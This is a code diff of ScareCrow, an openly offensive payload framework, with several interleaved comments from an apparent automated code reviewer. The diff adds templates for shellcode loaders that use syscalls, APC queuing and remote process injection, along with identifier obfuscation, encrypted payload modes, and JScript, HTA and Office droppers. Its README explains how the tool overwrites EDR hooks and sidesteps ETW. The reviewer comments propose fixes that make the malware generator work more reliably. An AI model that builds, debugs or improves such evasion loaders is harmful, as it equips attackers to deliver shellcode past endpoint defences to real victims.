+ Shellcode_Loader.Variables["loader"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["bytesdata"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["locdata"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["xdata"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["dllBasedata"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["oldptrperms"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["sysid"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["CreateProcess"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["GetModuleInformation"] =
Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["Target"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["addr"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["buf"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["commandLine"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["data"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["err"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["hModule"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["hProcess"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["handleSize"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["hh"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["lpBuffer"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["mi"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["mod"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["modules"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["module"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["nLength"] = Cryptor.VarNumberLength(10, 19)
+
Shellcode_Loader.Variables["nSize"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["name"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["needed"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["n"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["offsetaddr"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["oldProtect"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["outString"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["pi"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["process"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["rawbytes"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["s"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["si"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["size"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["startupInfo"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["dll"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["error"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["x"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["bytes"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19)
+
Shellcode_Loader.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["PROCESS_ALL_ACCESS"] = PROCESS_ALL_ACCESS + Shellcode_Loader.Variables["WriteProcessMemory"] = WriteProcessMemory + Shellcode_Loader.Variables["MI"] = Cryptor.VarNumberLength(4, 9) + + if console == true { + + Shellcode_Loader.Variables["AllocatingMessage"] = "printDebug(\"[+] Allocating a RWX Section of the Process\")" + Shellcode_Loader.Variables["RtlCopyMemoryMessage"] = "printDebug(\"[+] Copying Shellcode to Memory with RtlCopyMemory\")" + Shellcode_Loader.Variables["VirtualProtectMessage"] = "printDebug(\"[+] Calling VirtualProtect to Change Memory to not Writeable\")" + Shellcode_Loader.Variables["GetCurrentThreadMessage"] = "printDebug(\"[+] Calling GetCurrentThread to get a Handle on the Current Process\")" + Shellcode_Loader.Variables["NtQueueApcThreadExMessage"] = "printDebug(\"[+] Calling NtQueueApcThreadEx API to Execute Shellcode\")" + Shellcode_Loader.Variables["SyscallMessage"] = "printDebug(\"[*] Calling the Shellcode Using a Syscall\")" + Shellcode_Loader.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Shellcode_Loader.Variables["DLLname"] + "+\" \")" + Shellcode_Loader.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Shellcode_Loader.Variables["Version"] + ")" + Shellcode_Loader.Variables["PPIDMessage"] = + `strpid := fmt.Sprint(` + Shellcode_Loader.Variables["pi"] + `.ProcessId) + printDebug("[*] Creating Remote Process: " + strpid) + printDebug("[*] Creating Handle to Remote Process")` + Shellcode_Loader.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")" + Shellcode_Loader.Variables["addr"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["RemoteModuleEnumeration"] = + `` + Shellcode_Loader.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Shellcode_Loader.Variables["MI"] + `.LpBaseOfDll) + printDebug("[+] " + ` + Shellcode_Loader.Variables["s"] + ` + "'s Base Address: " + 
` + Shellcode_Loader.Variables["addr"] + `) + printDebug("[*] Reloading " + ` + Shellcode_Loader.Variables["s"] + ` + "'s .Text Field")` + Shellcode_Loader.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")" + Shellcode_Loader.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" + Shellcode_Loader.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" + Shellcode_Loader.Variables["Injected"] = "printDebug(\"[+] Injected!\")" } else { - Binary.Variables["HEX_Import"] = `` - } + Shellcode_Loader.Variables["RemoteModuleEnumeration"] = "" + Shellcode_Loader.Variables["PPIDMessage"] = "" + Shellcode_Loader.Variables["ModuleMessage"] = "" + Shellcode_Loader.Variables["RemoteModuleMessage"] = "" + Shellcode_Loader.Variables["RemoteReloading"] = "" + Shellcode_Loader.Variables["Injecting"] = "" + Shellcode_Loader.Variables["Injected"] = "" + + Shellcode_Loader.Variables["AllocatingMessage"] = "" + Shellcode_Loader.Variables["RtlCopyMemoryMessage"] = "" + Shellcode_Loader.Variables["VirtualProtectMessage"] = "" + Shellcode_Loader.Variables["GetCurrentThreadMessage"] = "" + Shellcode_Loader.Variables["NtQueueApcThreadExMessage"] = "" + Shellcode_Loader.Variables["SyscallMessage"] = "" + } if ProcessInjection != "" { ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) - Binary.Variables["processpath"] = ProcessInjection + Shellcode_Loader.Variables["processpath"] = ProcessInjection - Binary.Variables["offset"] = Cryptor.VarNumberLength(4, 9) - Binary.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) + Shellcode_Loader.Variables["offset"] = Cryptor.VarNumberLength(4, 9) + Shellcode_Loader.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) Structure = Struct.Procces_Injection() - - } else { - Structure = Struct.Binary() } - - if Sleep == false { - Binary.Variables["SleepSecond"] = strconv.Itoa(Cryptor.GenerateNumer(2220, 2900)) - fmt.Println("[+] Sleep 
Timer set for " + Binary.Variables["SleepSecond"] + " milliseconds ") - } else { - Binary.Variables["SleepSecond"] = "0" + if Exec_Type == "VirtualAlloc" { + Structure = Struct.Syscall_Alloc() } - - BinaryTemplate, err := template.New("Binary").Parse(Structure) + if Exec_Type == "RtlCopy" { + Structure = Struct.Syscall_RtlCopy() + } + if Exec_Type == "NtQueueApcThreadEx" { + Structure = Struct.Syscall_NtQueueAPCThreadEx_Local() + } + Shellcode_LoaderTemplate, err := template.New("Shellcode_Loader").Parse(Structure) if err != nil { log.Fatal(err) } - if err := BinaryTemplate.Execute(&buffer, Binary); err != nil { + if err := Shellcode_LoaderTemplate.Execute(&buffer, Shellcode_Loader); err != nil { log.Fatal(err) } - return buffer.String(), Binary.Variables["FuncName"], Binary.Variables["NTFuncName"] -} + return buffer.String(), Shellcode_Loader.Variables["FunctionName"], Shellcode_Loader.Variables["raw_bin"] -func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName string, NTFuncName string) { +} +func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName string, NTFuncName string, encryptionmode string) { var buffer bytes.Buffer Shellcode := &Shellcode{} Shellcode.Variables = make(map[string]string) + var Structure string buffer.Reset() Shellcode.Variables["FuncName"] = FuncName Shellcode.Variables["fullciphertext"] = Cryptor.VarNumberLength(10, 19) 
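Review bot: The `}` removed right after `Binary.Variables["Injected"] = ""` at the top of this hunk, together with the `} else {` removed before `Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)"` in the preceding hunk, leaves the `(false)` assignment and the run of `= ""` assignments down to `SyscallMessage` inside the `if console == true {` block rather than in an else branch, as far as the collapsed rendering can be read: a console build then clears every debug string it has just set, and a non-console build never assigns `hide` or the message keys at all. Restoring `} else {` in front of the `(false)` line keeps the two branches exclusive. In Shellcode_Loader_Buff, `ReloadingMessage` and `VersionMessage` concatenate `Shellcode_Loader.Variables["DLLname"]` and `Shellcode_Loader.Variables["Version"]`, but no line of that function assigns either key, so if a template expands them the generated statement carries an empty identifier (`"[+] Reloading: "++" "`). The `Exec_Type` chain at the end of that function leaves `Structure` empty for any other value and `template.Parse("")` accepts that silently, so a `switch` with `default: log.Fatalf("unknown exec type %q", Exec_Type)` would surface the mistake at build time; the `encryptionmode` chain in Shellcode_Buff in the next hunk has the same gap. Binaryfile's body begins before this hunk and Shellcode_Buff's continues past it.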
@@ -849,6 +897,11 @@ func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName
 Shellcode.Variables["src"] = Cryptor.VarNumberLength(10, 19)
 Shellcode.Variables["unpadding"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode.Variables["buff"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode.Variables["buff2"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode.Variables["clear"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode.Variables["err"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode.Variables["sysid"] = Cryptor.VarNumberLength(10, 19)
 Shellcode.Variables["processHandle"] = Cryptor.VarNumberLength(10, 19)
 Shellcode.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19)
@@ -857,7 +910,17 @@ func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName
 Shellcode.Variables["oldprotect"] = Cryptor.VarNumberLength(10, 19)
 Shellcode.Variables["NtProtectVirtualMemoryprep"] = NTFuncName
- ShellcodeTemplate, err := template.New("Shellcode").Parse(Struct.Decrypt_Function())
+ if encryptionmode == "ELZMA" {
+ Structure = Struct.ELZMADecrypt_Function()
+ }
+ if encryptionmode == "AES" {
+ Structure = Struct.AESDecrypt_Function()
+ }
+ if encryptionmode == "RC4" {
+ Structure = Struct.RCFDecrypt_Function()
+ }
+
+ ShellcodeTemplate, err := template.New("Shellcode").Parse(Structure)
 if err != nil {
 log.Fatal(err)
 }
@@ -869,7 +932,7 @@ func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName
 }
-func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, CommandLoader string) (string, string, string) {
+func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, CommandLoader string) (string, string, string, string) {
 var LoaderTemplate string
 var buffer bytes.Buffer
 JScriptLoader := &JScriptLoader{}
@@ -908,7 +971,7 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, } } if mode == "wscript" { - JScriptLoader.Variables["dllext"] = ".dll" + JScriptLoader.Variables["dllext"] = "." + Cryptor.VarNumberLength(10, 19) JScriptLoader.Variables["FileName"] = name JScriptLoader.Variables["DLLName"] = name JScriptLoader.Variables["manifest"] = Cryptor.VarNumberLength(10, 19) @@ -916,6 +979,7 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, JScriptLoader.Variables["Execute"] = Cryptor.VarNumberLength(10, 19) JScriptLoader.Variables["progid"] = Cryptor.VarNumberLength(10, 19) JScriptLoader.Variables["filename"] = name + LoaderTemplate = Struct.WS_JS() } buffer.Reset() @@ -928,11 +992,11 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, log.Fatal(err) } - return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"] + return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"], JScriptLoader.Variables["dllext"] } -func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool) string { +func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool, wsextension string) string { var buffer bytes.Buffer JScript := &JScript{} SandboxJScript := &SandboxJScript{} 
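Review bot: `JScriptLoader_Buff` now returns four bare strings and `JScript_Buff` gains a `wsextension` parameter, but nothing states that the fourth result is the randomized `dllext` (`"." + Cryptor.VarNumberLength(10, 19)`) that must be threaded into `JScript_Buff` so the manifest and the dropped file agree on the extension. Named results document the contract at the signature: `func JScriptLoader_Buff(name, filename, mode string, sandbox bool, CommandLoader string) (code, fso, dropPath, dllext string)`. Note that `dllext` is only assigned in the `mode == "wscript"` branch visible here; for other modes the fourth value is whatever an earlier branch (outside this hunk) put in the map, or "" — a one-line comment at the `return` saying callers only consume it for wscript would avoid that surprise. Both functions' bodies continue outside this hunk.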
@@ -963,6 +1027,14 @@ func JScript_Buff(fso string, dropPath string, encoded string, code string, name JScript.Variables["Loader"] = code JScript.Variables["Magic1"] = Cryptor.VarNumberLength(10, 19) + JScript.Variables["rc4"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["decodeBase64"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["b4decoded"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["b4decodedkey"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["rc4key"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["rc4str"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9) + if mode == "excel" { JScript.Variables["dllext"] = ".xll" JScript.Variables["FileName"] = name @@ -972,7 +1044,7 @@ func JScript_Buff(fso string, dropPath string, encoded string, code string, name JScript.Variables["FileName"] = name } if mode == "wscript" { - JScript.Variables["dllext"] = ".dll" + JScript.Variables["dllext"] = wsextension JScript.Variables["FileName"] = name } if mode == "msiexec" { @@ -1081,7 +1153,7 @@ func Macro_Buff(URL string, outFile string) { fmt.Println(buffer.String()) } -func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, refresher bool, console bool, sandbox bool, ETW bool, ProcessInjection string, sleep bool, AMSI bool) (string, string) { +func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, console bool, sandbox bool, ETW bool, ProcessInjection string, sleep bool, AMSI bool, export string, encryptionmode string, exectype string, evasion string) (string, string) { var code, FuncName, NTFuncName string name, filename := FileName(mode) if ETW == false { 
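Review bot: The seven identifiers generated with `Cryptor.VarNumberLength(4, 9)` (`rc4`, `decodeBase64`, `b4decoded`, `rc4key`, …) are emitted as variable names into the JScript loader, and at four characters a random alphabetic token can land on a JScript reserved word or builtin (`this`, `null`, `true`, `void`, `with`, `eval`, `case`, `else`) and break the generated script; if the generator draws from plain letters this is a real if rare failure, and nothing here guards against two of the seven colliding with each other either. Every other template variable in this function uses `(10, 19)`; using the same range here, or checking the result against a small reserved-word list before accepting it, removes the risk at negligible cost: `JScript.Variables["rc4"] = Cryptor.VarNumberLength(10, 19)`. JScript_Buff's body continues outside this hunk.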
@@ -1094,11 +1166,8 @@ func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, fmt.Println("[+] Process Injection Mode Enabled") fmt.Println("[*] Created Process: " + ProcessInjection) } - if mode == "excel" || mode == "wscript" || mode == "control" || mode == "dll" || mode == "msiexec" { - code, FuncName, NTFuncName = DLLfile(b64ciphertext, b64key, b64iv, mode, refresher, name, sandbox, ETW, ProcessInjection, AMSI) - } else { - code, FuncName, NTFuncName = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection, sleep, AMSI) - } + Exec_Type := exectype + code, FuncName, NTFuncName = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection, sleep, AMSI, export, Exec_Type, evasion) os.MkdirAll(name, os.ModePerm) Utils.Writefile(name+"/"+name+".go", code) Utils.B64decode("loader.zip") @@ -1131,13 +1200,19 @@ func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, } os.Chdir(name) - Shellcode_Buff(b64ciphertext, b64key, b64iv, FuncName, NTFuncName) - Utils.ModuleObfuscator(name, FuncName) + Shellcode_Buff(b64ciphertext, b64key, b64iv, FuncName, NTFuncName, encryptionmode) + Utils.ModuleObfuscator(name, FuncName, encryptionmode) return name, filename } -func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool, Sha bool, path string) { +func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool, path string) { + if mode == "binary" { + Utils.GoEditor(name + ".exe") + } else { + Utils.GoEditor(name + ".dll") + } if mode == "excel" { os.Rename(name+".dll", name+".xll") + Utils.Sha256(name + ".xll") } else if mode == "control" { os.Rename(name+".dll", name+".cpl") if outFile == "" { 
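Review bot: The new `Utils.GoEditor(name + ".dll")` at the top of `CompileLoader` assumes the compiled artifact already sits at `name+".dll"`, but the `wscript` and `msiexec` branches further down rename from `outFile+".dll"`, so when `-O` differs from the generated name the editor appears to run on a path that does not exist yet; if `GoEditor` returns an error it is also discarded here. Either run it after the per-mode rename on the path each branch actually ends with, or check its result — `if err := Utils.GoEditor(target); err != nil { log.Fatal(err) }` — assuming it returns one. The surrounding `os.Rename` calls likewise ignore their errors, so a failed rename is only noticed when the later `Sha256` call cannot find the file. CompileLoader's body continues outside this hunk.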
@@ -1145,6 +1220,7 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co os.Rename(name+"/"+name+".cpl", name+".cpl") os.RemoveAll(name) fmt.Println("[+] " + name + ".cpl File Ready") + Utils.Sha256(name + ".cpl") if CommandLoader == "control" { outFile = name + ".cpl" Utils.Command(URL, CommandLoader, outFile) @@ -1156,8 +1232,10 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co } } else if mode == "wscript" { os.Rename(outFile+".dll", name+".dll") + Utils.Sha256(name + ".dll") } else if mode == "msiexec" { os.Rename(outFile+".dll", name+".dll") + Utils.Sha256(name + ".dll") } else if mode == "binary" { os.Chdir("..") os.Rename(name+"/"+name+".exe", name+".exe") @@ -1170,11 +1248,13 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co outFile = name + ".exe" Utils.Command(URL, CommandLoader, outFile) } + Utils.Sha256(name + ".exe") return } else if mode == "dll" { os.Chdir("..") os.Rename(name+"/"+name+".dll", name+".dll") os.RemoveAll(name) + Utils.Sha256(name + ".dll") fmt.Println("[+] DLL Compiled") fmt.Println("[!] Note: Loading a dll (with Rundll32 or Regsvr32) that has the same name as a valid system DLL will cause problems, in this case its best to change the name slightly") if path != "" { 
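Review bot: `Utils.Sha256` is now called from inside every mode branch (`.cpl`, `.dll` twice, `.exe`, `.dll`), each on a slightly different path expression, which is easy to desynchronise the next time a branch's rename target changes. A single call on the final artifact after the branch chain — a `final` variable that each branch assigns, followed by one `Utils.Sha256(final)` — keeps the hash tied to the file that was actually produced. The ordering is also uneven: the `binary` branch hashes after `Utils.Command`, the `dll` branch before `Utils.FileMover`; whichever is intended (hash the file where it is delivered, presumably) should be the same for all. CompileLoader starts and ends outside this hunk.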
@@ -1183,21 +1263,20 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co return } fmt.Println("[*] Creating Loader") - code, fso, dropPath := JScriptLoader_Buff(name, filename, mode, sandbox, CommandLoader) + code, fso, dropPath, wsextension := JScriptLoader_Buff(name, filename, mode, sandbox, CommandLoader) f, _ := os.Open(filename) reader := bufio.NewReader(f) content, _ := ioutil.ReadAll(reader) encoded := base64.StdEncoding.EncodeToString(content) - finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox) + finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox, wsextension) + URL = Utils.Command(URL, CommandLoader, outFile) if CommandLoader == "hta" { var HTAtemplate string if mode == "wscript" { HTAtemplate = "HTA_WScript" finalcode = HTA_Buff(hex.EncodeToString([]byte(finalcode)), filename, HTAtemplate) - if Sha == true { - fmt.Println("[!] Note an additional file: " + filename + ".js will be dropped in the user's TEMP folder") - } + fmt.Println("[!] Note an additional file: " + filename + ".js will be dropped in the user's TEMP folder") } else { HTAtemplate = "HTA" finalcode = HTA_Buff(finalcode, filename, HTAtemplate) @@ -1209,12 +1288,10 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co Utils.Writefile(outFile, finalcode) os.Chdir("..") os.Rename(name+"/"+outFile, outFile) - if Sha == true { - Utils.Sha256(outFile) - } os.RemoveAll(name) if path != "" { Utils.FileMover(outFile, path) } + Utils.Sha256(outFile) fmt.Println("[+] Loader Compiled") } diff --git a/README.md b/README.md index 4f581b4..185aa82 100644 --- a/README.md +++ b/README.md 
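Review bot: In the last hunk `Utils.Sha256(outFile)` has moved below `if path != "" { Utils.FileMover(outFile, path) }`, so when `-outpath` is given the hash is taken from a path the file has presumably (the helper's name suggests a move) just been relocated away from; the removed code hashed before any move, and the `dll` branch earlier in this function still hashes before `FileMover`. Restore that order: `Utils.Sha256(outFile)` directly after `os.Rename(name+"/"+outFile, outFile)`, ahead of `os.RemoveAll(name)` and the `FileMover` block. The first hunk also leaves `f, _ := os.Open(filename)` and `ioutil.ReadAll(reader)` unchecked with `f` never closed — pre-existing, but since this commit rewrites the adjacent lines, `defer f.Close()` and an error check would fit here. CompileLoader's body starts outside this hunk.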
@@ -13,28 +13,50 @@ If you want to learn more about the techniques utilized in this framework please # ## Description -ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute. +ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. -When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. 
Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. +ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute. + +ScareCrow uses 1 of 2 methods to unhook + +### Disk + +When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead it only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this, ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. + +To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges. -To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges. 
-Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions. -ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption and initialization vector key. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLmain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DLLMain being there. +#### Indirect Syscalls +ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by one of three encryption methods (outlined below). Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified, ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLMain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DLLMain being there. ### Binary Sample

+ After

+### KnownDLLs + +KnownDLLs is a list of DLLs that are loaded by Windows during the system startup process. Because these DLLs are considered to be essential to the functioning of the operating system, they are cached to help reduce load times and improve performance when applications start up. KnownDLLs includes DLLs such as kernel32.dll, kernelbase.dll, and ntdll.dll. + +Utilizing these KnownDlls, ScareCrow maps a copy of the DLL from `\KnownDlls\` using a combination of NtOpenSection and NtMapViewOfSection to load it into the process's memory. ScareCrow doesn't load the entire DLL, rather it only loads in the .text section of the DLL (as this contains all the syscalls). From there ScareCrow use indirect Syscalls to call NtProtectVirtualMemory and change the permissions of the dll's .text memory section to allow Scarecrow to overwrite the EDR’s hooks before restoring permissions. + + +For more information you can read modexp's detailed [article]("https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/") + + +Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions. During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. 
